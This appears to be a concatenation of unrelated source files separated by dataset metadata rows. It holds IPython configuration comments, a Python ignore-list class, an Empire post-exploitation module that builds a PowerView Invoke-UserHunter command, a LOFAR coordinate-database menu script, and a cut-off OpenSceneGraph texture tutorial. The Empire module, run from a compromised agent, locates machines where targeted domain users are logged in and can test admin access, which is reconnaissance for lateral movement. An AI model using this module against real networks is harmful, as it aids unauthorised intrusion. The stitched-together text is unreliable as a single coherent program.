# c.TerminalInteractiveShell.loop_runner = 'IPython.core.interactiveshell._asyncio_runner'
# Default: {}
# c.TerminalInteractiveShell.mime_renderers = {}
## Enable mouse support in the prompt (Note: prevents selecting text with the
# mouse)
# Default: False
# c.TerminalInteractiveShell.mouse_support = False
# See also: InteractiveShell.object_info_string_level
# c.TerminalInteractiveShell.object_info_string_level = 0
##
# See also: InteractiveShell.pdb
# c.TerminalInteractiveShell.pdb = False
## Deprecated since IPython 4.0 and ignored since 5.0, set
# TerminalInteractiveShell.prompts object directly.
# See also: InteractiveShell.prompt_in1
# c.TerminalInteractiveShell.prompt_in1 = 'In [\\#]: '
## Deprecated since IPython 4.0 and ignored since 5.0, set
# TerminalInteractiveShell.prompts object directly.
# See also: InteractiveShell.prompt_in2
# c.TerminalInteractiveShell.prompt_in2 = ' .\\D.: '
## Display the current vi mode (when using vi editing mode).
# Default: True
# c.TerminalInteractiveShell.prompt_includes_vi_mode = True
## Deprecated since IPython 4.0 and ignored since 5.0, set
# TerminalInteractiveShell.prompts object directly.
# See also: InteractiveShell.prompt_out
# c.TerminalInteractiveShell.prompt_out = 'Out[\\#]: '
## Class used to generate Prompt token for prompt_toolkit
# Default: 'IPython.terminal.prompts.Prompts'
# c.TerminalInteractiveShell.prompts_class = 'IPython.terminal.prompts.Prompts'
## Deprecated since IPython 4.0 and ignored since 5.0, set
# TerminalInteractiveShell.prompts object directly.
# See also: InteractiveShell.prompts_pad_left
# c.TerminalInteractiveShell.prompts_pad_left = True
# See also: InteractiveShell.quiet
# c.TerminalInteractiveShell.quiet = False
# See also: InteractiveShell.separate_in
# c.TerminalInteractiveShell.separate_in = '\n'
# See also: InteractiveShell.separate_out
# c.TerminalInteractiveShell.separate_out = ''
# See also: InteractiveShell.separate_out2
# c.TerminalInteractiveShell.separate_out2 = ''
## Show rewritten input, e.g. for autocall.
# See also: InteractiveShell.show_rewritten_input
# c.TerminalInteractiveShell.show_rewritten_input = True
## Use `raw_input` for the REPL, without completion and prompt colors.
#
# Useful when controlling IPython as a subprocess, and piping STDIN/OUT/ERR.
# Known usage are: IPython own testing machinery, and emacs inferior-shell
# integration through elpy.
#
# This mode default to `True` if the `IPY_TEST_SIMPLE_PROMPT` environment
# variable is set, or the current terminal is not a tty.
# Default: False
# c.TerminalInteractiveShell.simple_prompt = False
## Number of lines at the bottom of the screen to reserve for the tab completion
# menu, search history, etc.; the height of these menus will be at most this
# value. Increase it if you prefer long and skinny menus, decrease it for short
# and wide ones.
# Default: 6
# c.TerminalInteractiveShell.space_for_menu = 6
##
# See also: InteractiveShell.sphinxify_docstring
# c.TerminalInteractiveShell.sphinxify_docstring = False
## Automatically set the terminal title
# Default: True
# c.TerminalInteractiveShell.term_title = True
## Customize the terminal title format. This is a python format string.
# Available substitutions are: {cwd}.
# Default: 'IPython: {cwd}'
# c.TerminalInteractiveShell.term_title_format = 'IPython: {cwd}'
## Use 24bit colors instead of 256 colors in prompt highlighting. If your
# terminal supports true color, the following command should print 'TRUECOLOR'
# in orange: printf "\x1b[38;2;255;100;0mTRUECOLOR\x1b[0m\n"
# Default: False
# c.TerminalInteractiveShell.true_color = False
# See also: InteractiveShell.wildcards_case_sensitive
# c.TerminalInteractiveShell.wildcards_case_sensitive = True
## Switch modes for the IPython exception handlers.
# See also: InteractiveShell.xmode
# c.TerminalInteractiveShell.xmode = 'Context'
# ------------------------------------------------------------------------------
# HistoryAccessor(HistoryAccessorBase) configuration
# ------------------------------------------------------------------------------
## Access the history database without adding to it.
#
# This is intended for use by standalone history tools. IPython shells use
# HistoryManager, below, which is a subclass of this.
## Options for configuring the SQLite connection
#
# These options are passed as keyword args to sqlite3.connect when establishing
# database connections.
# Default: {}
# c.HistoryAccessor.connection_options = {}
## enable the SQLite history
#
# set enabled=False to disable the SQLite history, in which case there will be
# no stored history, no SQLite connection, and no background saving thread.
# This may be necessary in some threaded environments where IPython is embedded.
# Default: True
# c.HistoryAccessor.enabled = True
## Path to file to use for SQLite history database.
#
# By default, IPython will put the history database in the IPython profile
# directory. If you would rather share one history among profiles, you can set
# this value in each, so that they are consistent.
#
# Due to an issue with fcntl, SQLite is known to misbehave on some NFS mounts.
# If you see IPython hanging, try setting this to something on a local disk,
# e.g::
#
# ipython --HistoryManager.hist_file=/tmp/ipython_hist.sqlite
#
# you can also use the specific value `:memory:` (including the colons at both
# ends, but not the backticks), to avoid creating a history file.
# Default: ''
# c.HistoryAccessor.hist_file = ''
# ------------------------------------------------------------------------------
# HistoryManager(HistoryAccessor) configuration
# ------------------------------------------------------------------------------
## A class to organize all history-related functionality in one place.
## Options for configuring the SQLite connection
# See also: HistoryAccessor.connection_options
# c.HistoryManager.connection_options = {}
## Write to database every x commands (higher values save disk access & power).
# Values of 1 or less effectively disable caching.
# Default: 0
# c.HistoryManager.db_cache_size = 0
## Should the history database include output? (default: no)
# Default: False
# c.HistoryManager.db_log_output = False
## enable the SQLite history
# See also: HistoryAccessor.enabled
# c.HistoryManager.enabled = True
## Path to file to use for SQLite history database.
# See also: HistoryAccessor.hist_file
# c.HistoryManager.hist_file = ''
# ------------------------------------------------------------------------------
# ProfileDir(LoggingConfigurable) configuration
# ------------------------------------------------------------------------------
## An object to manage the profile directory and its resources.
#
# The profile directory is used by all IPython applications, to manage
# configuration, logging and security.
#
# This object knows how to find, create and manage these directories. This
# should be used by any code that wants to handle profiles.
## Set the profile location directly. This overrides the logic used by the
# `profile` option.
# Default: ''
# c.ProfileDir.location = ''
# ------------------------------------------------------------------------------
# BaseFormatter(Configurable) configuration
# ------------------------------------------------------------------------------
## A base formatter class that is configurable.
#
# This formatter should usually be used as the base class of all formatters. It
# is a traited :class:`Configurable` class and includes an extensible API for
# users to determine how their objects are formatted. The following logic is
# used to find a function to format an given object.
#
# 1. The object is introspected to see if it has a method with the name
# :attr:`print_method`. If is does, that object is passed to that method
# for formatting.
# 2. If no print method is found, three internal dictionaries are consulted
# to find print method: :attr:`singleton_printers`, :attr:`type_printers`
# and :attr:`deferred_printers`.
#
# Users should use these dictionaries to register functions that will be used to
# compute the format data for their objects (if those objects don't have the
# special print methods). The easiest way of using these dictionaries is through
# the :meth:`for_type` and :meth:`for_type_by_name` methods.
#
# If no function/callable is found to compute the format data, ``None`` is
# returned and this format type is not used.
# Default: {}
# c.BaseFormatter.deferred_printers = {}
# Default: True
# c.BaseFormatter.enabled = True
# Default: {}
# c.BaseFormatter.singleton_printers = {}
# Default: {}
# c.BaseFormatter.type_printers = {}
# ------------------------------------------------------------------------------
# PlainTextFormatter(BaseFormatter) configuration
# ------------------------------------------------------------------------------
## The default pretty-printer.
#
# This uses :mod:`IPython.lib.pretty` to compute the format data of the object.
# If the object cannot be pretty printed, :func:`repr` is used. See the
# documentation of :mod:`IPython.lib.pretty` for details on how to write pretty
# printers. Here is a simple example::
#
# def dtype_pprinter(obj, p, cycle):
# if cycle:
# return p.text('dtype(...)')
# if hasattr(obj, 'fields'):
# if obj.fields is None:
# p.text(repr(obj))
# else:
# p.begin_group(7, 'dtype([')
# for i, field in enumerate(obj.descr):
# if i > 0:
# p.text(',')
# p.breakable()
# p.pretty(field)
# p.end_group(7, '])')
# See also: BaseFormatter.deferred_printers
# c.PlainTextFormatter.deferred_printers = {}
# Default: ''
# c.PlainTextFormatter.float_precision = ''
## Truncate large collections (lists, dicts, tuples, sets) to this size.
#
# Set to 0 to disable truncation.
# Default: 1000
# c.PlainTextFormatter.max_seq_length = 1000
# Default: 79
# c.PlainTextFormatter.max_width = 79
# Default: '\n'
# c.PlainTextFormatter.newline = '\n'
# Default: True
# c.PlainTextFormatter.pprint = True
# See also: BaseFormatter.singleton_printers
# c.PlainTextFormatter.singleton_printers = {}
# See also: BaseFormatter.type_printers
# c.PlainTextFormatter.type_printers = {}
# Default: False
# c.PlainTextFormatter.verbose = False
# ------------------------------------------------------------------------------
# Completer(Configurable) configuration
# ------------------------------------------------------------------------------
## Enable unicode completions, e.g. \alpha<tab> . Includes completion of latex
# commands, unicode names, and expanding unicode characters back to latex
# commands.
# Default: True
# c.Completer.backslash_combining_completions = True
## Enable debug for the Completer. Mostly print extra information for
# experimental jedi integration.
# Default: False
# c.Completer.debug = False
## Activate greedy completion. PENDING DEPRECATION: this is now mostly taken
# care of with Jedi.
#
# This will enable completion on elements of lists, results of function calls,
# etc., but can be unsafe because the code is actually evaluated on TAB.
# Default: False
# c.Completer.greedy = False
## Experimental: restrict time (in milliseconds) during which Jedi can compute
# types. Set to 0 to stop computing types. Non-zero value lower than 100ms may
# hurt performance by preventing jedi to build its cache.
# Default: 400
# c.Completer.jedi_compute_type_timeout = 400
## Experimental: Use Jedi to generate autocompletions. Default to True if jedi is
# installed.
# Default: True
# c.Completer.use_jedi = True
# ------------------------------------------------------------------------------
# IPCompleter(Completer) configuration
# ------------------------------------------------------------------------------
## Extension of the completer class with IPython-specific features
## Enable unicode completions, e.g. \alpha<tab> . Includes completion of latex
# commands, unicode names, and expanding unicode characters back to latex
# commands.
# See also: Completer.backslash_combining_completions
# c.IPCompleter.backslash_combining_completions = True
## Enable debug for the Completer. Mostly print extra information for
# experimental jedi integration.
# See also: Completer.debug
# c.IPCompleter.debug = False
## Activate greedy completion
# See also: Completer.greedy
# c.IPCompleter.greedy = False
## Experimental: restrict time (in milliseconds) during which Jedi can compute
# types.
# See also: Completer.jedi_compute_type_timeout
# c.IPCompleter.jedi_compute_type_timeout = 400
## DEPRECATED as of version 5.0.
#
# Instruct the completer to use __all__ for the completion
#
# Specifically, when completing on ``object.<tab>``.
#
# When True: only those names in obj.__all__ will be included.
#
# When False [default]: the __all__ attribute is ignored
# Default: False
# c.IPCompleter.limit_to__all__ = False
## Whether to merge completion results into a single list
#
# If False, only the completion results from the first non-empty completer will
# be returned.
# Default: True
# c.IPCompleter.merge_completions = True
## Instruct the completer to omit private method names
#
# Specifically, when completing on ``object.<tab>``.
#
# When 2 [default]: all names that start with '_' will be excluded.
#
# When 1: all 'magic' names (``__foo__``) will be excluded.
#
# When 0: nothing will be excluded.
# Choices: any of [0, 1, 2]
# Default: 2
# c.IPCompleter.omit__names = 2
## Experimental: Use Jedi to generate autocompletions. Default to True if jedi is
# installed.
# See also: Completer.use_jedi
# c.IPCompleter.use_jedi = True
# ------------------------------------------------------------------------------
# ScriptMagics(Magics) configuration
# ------------------------------------------------------------------------------
## Magics for talking to scripts
#
# This defines a base `%%script` cell magic for running a cell with a program in
# a subprocess, and registers a few top-level magics that call %%script with
# common interpreters.
## Extra script cell magics to define
#
# This generates simple wrappers of `%%script foo` as `%%foo`.
#
# If you want to add script magics that aren't on your path, specify them in
# script_paths
# Default: []
# c.ScriptMagics.script_magics = []
## Dict mapping short 'ruby' names to full paths, such as '/opt/secret/bin/ruby'
#
# Only necessary for items in script_magics where the default path will not find
# the right interpreter.
# Default: {}
# c.ScriptMagics.script_paths = {}
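# For example (illustrative, commented out), to expose a Ruby not on $PATH:
# c.ScriptMagics.script_magics = ['ruby']
# c.ScriptMagics.script_paths = {'ruby': '/opt/secret/bin/ruby'}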
# ------------------------------------------------------------------------------
# LoggingMagics(Magics) configuration
# ------------------------------------------------------------------------------
## Magics related to all logging machinery.
## Suppress output of log state when logging is enabled
# Default: False
# c.LoggingMagics.quiet = False
# ------------------------------------------------------------------------------
# StoreMagics(Magics) configuration
# ------------------------------------------------------------------------------
## Lightweight persistence for python variables.
#
# Provides the %store magic.
## If True, any %store-d variables will be automatically restored when IPython
# starts.
# Default: False
# c.StoreMagics.autorestore = False
| unlicense | -8,919,215,008,065,537,000 | 36.139289 | 222 | 0.687316 | false |
Zarthus/Reconcile | tools/ignorelist.py | 1 | 2663 | """
The MIT License (MIT)
Copyright (c) 2014 - 2015 Jos "Zarthus" Ahrens and contributors
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import re
class IgnoreList:
def __init__(self, ignorelist):
if ignorelist:
self.ignorelist = ignorelist
else:
self.ignorelist = []
def isIgnored(self, target):
if target.lower() in self.ignorelist:
return True
for user in self.ignorelist:
if "*" in user:
userRegex = self.compileIgnore(user)
if userRegex.match(target):
return True
return False
def isIgnoredWildcard(self, wctarget):
if "*" not in wctarget:
return self.isIgnored(wctarget)
target = self.compileIgnore(wctarget)
for user in self.ignorelist:
if target.match(user):
return True
if "*" in user:
userRegex = self.compileIgnore(user)
if userRegex.match(wctarget):
return True
return False
def ignore(self, target):
if target.lower() in self.ignorelist:
return False
self.ignorelist.append(target.lower())
return True
def unignore(self, target):
if target.lower() in self.ignorelist:
self.ignorelist.remove(target.lower())
return True
return False
def getIgnoreList(self):
return self.ignorelist
def compileIgnore(self, target):
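# Escape the literal text, then map wildcard '*' to '.*' and '?' to '.', case-insensitively.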
return re.compile(re.escape(target)
.replace("\\*", ".*")
.replace("\\?", "."), re.I)
| mit | 5,329,721,178,999,119,000 | 30.702381 | 77 | 0.640631 | false |
pierce403/EmpirePanel | lib/modules/situational_awareness/network/powerview/user_hunter.py | 1 | 5974 | from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-UserHunter',
'Author': ['@harmj0y'],
'Description': ('Finds which machines users of a specified group are logged into. '
'Part of PowerView.'),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'MinPSVersion' : '2',
'Comments': [
'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'ComputerName' : {
'Description' : 'Hosts to enumerate.',
'Required' : False,
'Value' : ''
},
'ComputerFilter' : {
'Description' : 'Host filter name to query AD for, wildcards accepted.',
'Required' : False,
'Value' : ''
},
'GroupName' : {
'Description' : 'Group name to query for target users.',
'Required' : False,
'Value' : ''
},
'TargetServer' : {
'Description' : 'Hunt for users who are effective local admins on a target server.',
'Required' : False,
'Value' : ''
},
'UserName' : {
'Description' : 'Specific username to search for.',
'Required' : False,
'Value' : ''
},
'UserFilter' : {
'Description' : 'A customized ldap filter string to use for user enumeration, e.g. "(description=*admin*)"',
'Required' : False,
'Value' : ''
},
'StopOnSuccess' : {
'Description' : 'Switch. Stop hunting after finding a target user.',
'Required' : False,
'Value' : ''
},
'NoPing' : {
'Description' : "Don't ping each host to ensure it's up before enumerating.",
'Required' : False,
'Value' : ''
},
'CheckAccess' : {
'Description' : 'Switch. Check if the current user has local admin access to found machines.',
'Required' : False,
'Value' : ''
},
'Delay' : {
'Description' : 'Delay between enumerating hosts, defaults to 0.',
'Required' : False,
'Value' : ''
},
'Domain' : {
'Description' : 'The domain to use for the query, defaults to the current domain.',
'Required' : False,
'Value' : ''
},
'DomainController' : {
'Description' : 'Domain controller to reflect LDAP queries through.',
'Required' : False,
'Value' : ''
},
'ShowAll' : {
'Description' : 'Switch. Return all user location results without filtering.',
'Required' : False,
'Value' : ''
},
'Stealth' : {
'Description' : 'Switch. Only enumerate sessions from commonly used target servers.',
'Required' : False,
'Value' : ''
},
'Threads' : {
'Description' : 'The maximum concurrent threads to execute.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
# get just the code needed for the specified function
script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
script += moduleName + " "
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
script += ' | fl | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
return script
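# Illustrative note (not part of the original module): with GroupName set to
# 'Domain Admins' and CheckAccess set to 'True', the generated command begins
# "Invoke-UserHunter -GroupName Domain Admins -CheckAccess" before the
# Out-String pipeline above is appended; option values are added unquoted,
# exactly as entered.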
| bsd-3-clause | -559,141,152,159,625,900 | 36.572327 | 128 | 0.4307 | false |
kernsuite-debian/lofar | MAC/Deployment/data/Coordinates/CoordMenu.py | 1 | 10615 | #!/usr/bin/env python
# P.Donker ASTRON
# and Arno Schoenmakers the Great
import sys
import pg
from subprocess import Popen
import os
import getpass
from optparse import OptionParser
from database import getDBname, getDBhost, getDBport, getDBuser
VERSION = '0.0.2' # version of this script
default_targetdate='2009.5'
def menu():
print("""
|=====================================|
| Coordinates menu |
|=====================================|
| 0 do all (1,2,3,4,5,6,7,9,11) |
| 1 destroy and create CDB |
| 2 create CDB objects |
| 3 load all normal-vectors |
| 4 load all rotation matrices |
| 5 load all hba_rotations |
| 6 calculate all HBADeltas |
| 7 load all ETRF(expected) files |
| 8 load one measurement file |
| 9 transform all ETRF to ITRF |
| 10 transform one ETRF to ITRF |
| 11 make all conf files |
| 12 make one conf file |
| Q quit |
|_____________________________________|
""")
def get_input_with_default(prompt, default_value):
answer = default_value
try:
input = raw_input # Python2 and Python3 compatible
except NameError:
pass
answer = input(prompt+" ["+str(default_value)+"]: ")
if (len(answer) == 0):
answer = default_value
return answer
def create_cdb():
print('Creating new database')
res = Popen('./create_CDB.sh').wait()
print(res)
def create_cdb_objects():
print('Creating database objects')
res = Popen('./create_CDB_objects.py').wait()
print(res)
def load_normal_vectors():
print('Loading normal vectors')
filename = get_input_with_default("enter filename to load", "data/normal_vectors.dat")
if len(filename) == 0:
print('Error, No filename given')
sys.exit()
if not os.path.exists(filename):
print("File does not exist")
sys.exit()
res = Popen(['./load_normal_vectors.py', filename]).wait()
if (res != 0):
sys.exit(1)
# time.sleep(3)
def load_rotation_matrices():
print('Loading rotation matrices')
filename = get_input_with_default("enter filename to load", "data/rotation_matrices.dat")
if len(filename) == 0:
print('Error, No filename given')
sys.exit()
if not os.path.exists(filename):
print("File does not exist")
sys.exit()
res = Popen(['./load_rotation_matrices.py', filename]).wait()
if (res != 0):
sys.exit(1)
# time.sleep(3)
def load_hba_rotations():
print('Loading hba field rotations')
filename = get_input_with_default("enter filename to load", "data/hba-rotations.csv")
if len(filename) == 0:
print('Error, No filename given')
sys.exit()
if not os.path.exists(filename):
print("File does not exist")
sys.exit()
res = Popen(['./load_hba_rotations.py', filename]).wait()
if (res != 0):
sys.exit(1)
# time.sleep(3)
def calculate_hba_deltas():
print('calculating hba-deltas')
# time.sleep(3)
res = Popen(['./calc_hba_deltas.py']).wait()
if (res != 0):
sys.exit(1)
def load_all_etrf():
print('loading all ETRF files from .//ETRF_FILES')
os.chdir(os.curdir+'/ETRF_FILES')
dirs = sorted(os.listdir(os.curdir))
for dir in dirs:
os.chdir(os.curdir+'/'+dir)
files = os.listdir(os.curdir)
for filename in files:
if not os.path.exists(filename):
print("File ",filename,"does not exist")
sys.exit()
res = Popen(['../../load_expected_pos.py', filename]).wait()
if (res != 0):
sys.exit(1)
os.chdir(os.pardir)
os.chdir(os.pardir)
def load_measurement():
print('load one measurement file')
filename = get_input_with_default("enter filename to load", "")
if len(filename) == 0:
print('Error, No filename given')
sys.exit()
if not os.path.exists(filename):
print("File ",filename,"does not exist")
sys.exit()
res = Popen(['./load_measurementfile.py', filename]).wait()
if (res != 0):
sys.exit(1)
def transform_all(db_host, db_port, db_name, db_user, db_password):
db = pg.connect(user=db_user, host=db_host, dbname=db_name, port=db_port, passwd=db_password)
print('Transform all ETRF coordinates to ITRF coordinates for given date')
target = get_input_with_default("Enter target_date", default_targetdate)
sql = "select distinct o.stationname from object o inner join field_rotations r on r.id = o.id"
all_stations = db.query(sql).getresult()
sql = "select distinct o.stationname from object o inner join reference_coord r on r.id = o.id"
ref_stations = db.query(sql).getresult()
for stationname in ref_stations:
station = stationname[0]
if 0 != Popen(['./calc_coordinates.py', station, "LBA", target]).wait():
sys.exit(1)
if 0 != Popen(['./calc_coordinates.py', station, "CLBA", target]).wait():
sys.exit(1)
# if station[:1] == 'C': # core station
if 0 != Popen(['./calc_coordinates.py', station, "HBA0", target]).wait():
sys.exit(1)
if 0 != Popen(['./calc_coordinates.py', station, "CHBA0", target]).wait():
sys.exit(1)
if 0 != Popen(['./calc_coordinates.py', station, "HBA1", target]).wait():
sys.exit(1)
if 0 != Popen(['./calc_coordinates.py', station, "CHBA1", target]).wait():
sys.exit(1)
# else: #remote or international station
if 0 != Popen(['./calc_coordinates.py', station, "HBA", target]).wait():
sys.exit(1)
if 0 != Popen(['./calc_coordinates.py', station, "CHBA", target]).wait():
sys.exit(1)
db.close()
missing_stations = list(set(all_stations) - set(ref_stations))
for stationname in missing_stations:
station = stationname[0]
print("Station with known HBA rotation but no ETRF: ",station)
def transform_one():
print('Transform ETRF coordinates to ITRF coordinates for given station and date')
station = get_input_with_default("Enter station ", "")
anttype = get_input_with_default("Enter type (LBA|HBA|HBA0|HBA1|CLBA|CHBA0|CHBA1|CHBA)", "")
target = get_input_with_default("Enter target_date ", default_targetdate)
res = Popen(['./calc_coordinates.py', station, anttype, target]).wait()
if (res != 0):
sys.exit(1)
def make_all_conf_files(db_host, db_port, db_name, db_user, db_password):
db = pg.connect(user=db_user, host=db_host, dbname=db_name, port=db_port, passwd=db_password)
print('Make all AntennaField.conf and iHBADeltas.conf files for given date')
target = get_input_with_default("Enter target_date", default_targetdate)
query = """select distinct o.stationname from
object o inner join reference_coord r on r.id = o.id"""
results = db.query(query).getresult()
for stationname in results:
station = stationname[0]
res = Popen(['./make_conf_files.py', station, target]).wait()
if (res != 0):
sys.exit(1)
res = Popen(['./make_all_station_file.py', target]).wait()
if (res != 0):
sys.exit(1)
db.close()
def make_one_conf_file():
print('Make one AntennaField.conf and iHBADeltas.conf file for given date')
station = get_input_with_default("Enter station ", "")
target = get_input_with_default("Enter target_date", default_targetdate)
res = Popen(['./make_conf_files.py', station, target]).wait()
if (res != 0):
sys.exit(1)
if __name__ == "__main__":
parser = OptionParser("Usage: %prog")
parser.add_option("-D", "--database",
dest="dbName",
type="string",
default=getDBname(),
help="Name of StationCoordinates database to use")
parser.add_option("-H", "--host",
dest="dbHost",
type="string",
default=getDBhost(),
help="Hostname of StationCoordinates database")
parser.add_option("-P", "--port",
dest="dbPort",
type="int",
default=getDBport(),
help="Port of StationCoordinates database")
parser.add_option("-U", "--user",
dest="dbUser",
type="string",
default=getDBuser(),
help="Username of StationCoordinates database")
# parse arguments
(options, args) = parser.parse_args()
dbName = options.dbName
dbHost = options.dbHost
dbPort = options.dbPort
dbUser = options.dbUser
dbPassword = None
while(1):
menu()
try:
input = raw_input # Python2 and Python3 compatible
except NameError:
pass
sel = input('Enter choice :')
if sel.upper() == 'Q':
sys.exit(1)
if sel == '1':
create_cdb()
if sel == '2':
create_cdb_objects()
if sel == '3':
load_normal_vectors()
if sel == '4':
load_rotation_matrices()
if sel == '5':
load_hba_rotations()
if sel == '6':
calculate_hba_deltas()
if sel == '7':
load_all_etrf()
if sel == '8':
load_measurement()
if sel == '9':
if dbPassword is None:
dbPassword = getpass.getpass("Database password:")
transform_all(dbHost, dbPort, dbName, dbUser, dbPassword)
if sel == '10':
transform_one()
if sel == '11':
if dbPassword is None:
dbPassword = getpass.getpass("Database password:")
make_all_conf_files(dbHost, dbPort, dbName, dbUser, dbPassword)
if sel == '12':
make_one_conf_file()
if sel == '0':
if dbPassword is None:
dbPassword = getpass.getpass("Database password:")
create_cdb()
create_cdb_objects()
load_normal_vectors()
load_rotation_matrices()
load_hba_rotations()
calculate_hba_deltas()
load_all_etrf()
transform_all(dbHost, dbPort, dbName, dbUser, dbPassword)
make_all_conf_files(dbHost, dbPort, dbName, dbUser, dbPassword)
| gpl-3.0 | -5,528,725,688,728,908,000 | 33.464286 | 99 | 0.557419 | false |
JaneliaSciComp/osgpyplusplus | examples/osg-tutorial/tut2_textures.py | 1 | 6318 | #!/bin/env python
# Translated into python from C++ tutorial at
# http:#trac.openscenegraph.org/projects/osg/wiki/Support/Tutorials/Textures
from osgpypp import osg, osgDB, osgViewer
import sys
# Creating Textured Geometry using StateSets
# Goals
# Add a texture to geometry defined by OpenGL drawing primitives introduced in
# tutorial Basic geometry.
# Background
# The previous tutorial introduced viewing scenes that include basic shapes
# created from OpenGL primitives. This section explains how to add textures to
# these shapes. To make the code easier to use, we'll put the pyramid code
# into a function that creates a geode and returns a pointer to it. The
# following code is from tutorial Basic geometry.
def createPyramid():
pyramidGeode = osg.Geode()
pyramidGeometry = osg.Geometry()
pyramidGeode.addDrawable(pyramidGeometry)
# Specify the vertices:
pyramidVertices = osg.Vec3Array()
pyramidVertices.append( osg.Vec3(0, 0, 0) ) # front left
pyramidVertices.append( osg.Vec3(2, 0, 0) ) # front right
pyramidVertices.append( osg.Vec3(2, 2, 0) ) # back right
pyramidVertices.append( osg.Vec3( 0,2, 0) ) # back left
pyramidVertices.append( osg.Vec3( 1, 1,2) ) # peak
# Associate this set of vertices with the geometry associated with the
# geode we added to the scene.
pyramidGeometry.setVertexArray( pyramidVertices )
# Create a QUAD primitive for the base by specifying the
# vertices from our vertex list that make up this QUAD:
pyramidBase = osg.DrawElementsUInt(osg.PrimitiveSet.QUADS, 0)
pyramidBase.append(3)
pyramidBase.append(2)
pyramidBase.append(1)
pyramidBase.append(0)
# Add this primitive to the geometry:
# pyramidGeometry.addPrimitiveSet(pyramidBase)
# code to create other faces goes here!
pyramidGeometry.addPrimitiveSet(pyramidBase)
# Repeat the same for each of the four sides. Again, vertices are specified in counter-clockwise order.
pyramidFaceOne = osg.DrawElementsUInt(osg.PrimitiveSet.TRIANGLES, 0)
pyramidFaceOne.append(0)
pyramidFaceOne.append(1)
pyramidFaceOne.append(4)
pyramidGeometry.addPrimitiveSet(pyramidFaceOne)
pyramidFaceTwo = osg.DrawElementsUInt(osg.PrimitiveSet.TRIANGLES, 0)
pyramidFaceTwo.append(1)
pyramidFaceTwo.append(2)
pyramidFaceTwo.append(4)
pyramidGeometry.addPrimitiveSet(pyramidFaceTwo)
pyramidFaceThree = osg.DrawElementsUInt(osg.PrimitiveSet.TRIANGLES, 0)
pyramidFaceThree.append(2)
pyramidFaceThree.append(3)
pyramidFaceThree.append(4)
pyramidGeometry.addPrimitiveSet(pyramidFaceThree)
pyramidFaceFour = osg.DrawElementsUInt(osg.PrimitiveSet.TRIANGLES, 0)
pyramidFaceFour.append(3)
pyramidFaceFour.append(0)
pyramidFaceFour.append(4)
pyramidGeometry.addPrimitiveSet(pyramidFaceFour)
colors = osg.Vec4Array()
colors.append(osg.Vec4(1.0, 0.0, 0.0, 1.0) ) #index 0 red
colors.append(osg.Vec4(0.0, 1.0, 0.0, 1.0) ) #index 1 green
colors.append(osg.Vec4(0.0, 0.0, 1.0, 1.0) ) #index 2 blue
colors.append(osg.Vec4(1.0, 1.0, 1.0, 1.0) ) #index 3 white
colors.append(osg.Vec4(1.0, 0.0, 0.0, 1.0) ) #index 4 red
pyramidGeometry.setColorArray(colors)
pyramidGeometry.setColorBinding(osg.Geometry.BIND_PER_VERTEX)
# Since the mapping from vertices to texture coordinates is 1:1,
# we don't need to use an index array to map vertices to texture
# coordinates. We can do it directly with the 'setTexCoordArray'
# method of the Geometry class.
# This method takes a variable that is an array of two dimensional
# vectors (osg.Vec2). This variable needs to have the same
# number of elements as our Geometry has vertices. Each array element
# defines the texture coordinate for the cooresponding vertex in the
# vertex array.
texcoords = osg.Vec2Array(5)
texcoords[0].set(0.00,0.0) # tex coord for vertex 0
texcoords[1].set(0.25,0.0) # tex coord for vertex 1
texcoords[2].set(0.50,0.0) # ""
texcoords[3].set(0.75,0.0) # ""
texcoords[4].set(0.50,1.0) # ""
pyramidGeometry.setTexCoordArray(0,texcoords)
return pyramidGeode
# Loading a Texture, Creating a State Set, assigning it to a Node
# The method for rendering primitives is controlled using StateSets. This
# section of code demonstrates how to load a texture from file, create a
# StateSet in which this texture is enabled, and assign this StateSet to a
# node in the scene. The first section starts out the same as previous
# tutorials. Initialize a viewer and build a scene with a single pyramid.
# Declare a group to act as root node of a scene:
root = osg.Group()
pyramidGeode = createPyramid()
root.addChild(pyramidGeode)
# Now for adding a texture. Here we'll declare a texture instance and set
# its data variance as 'DYNAMIC'. (If we don't declare the texture as dynamic,
# some of the osg's optimization routines could remove it.) The texture class
# encapsulates OpenGL texture modes (wrap, filter, etc.) as well as an
# osg.Image. The code below shows how to read an osg.Image instance from a
# file and associate this image with a texture.
KLN89FaceTexture = osg.Texture2D()
# protect from being optimized away as static state:
KLN89FaceTexture.setDataVariance(osg.Object.DYNAMIC)
# load an image by reading a file:
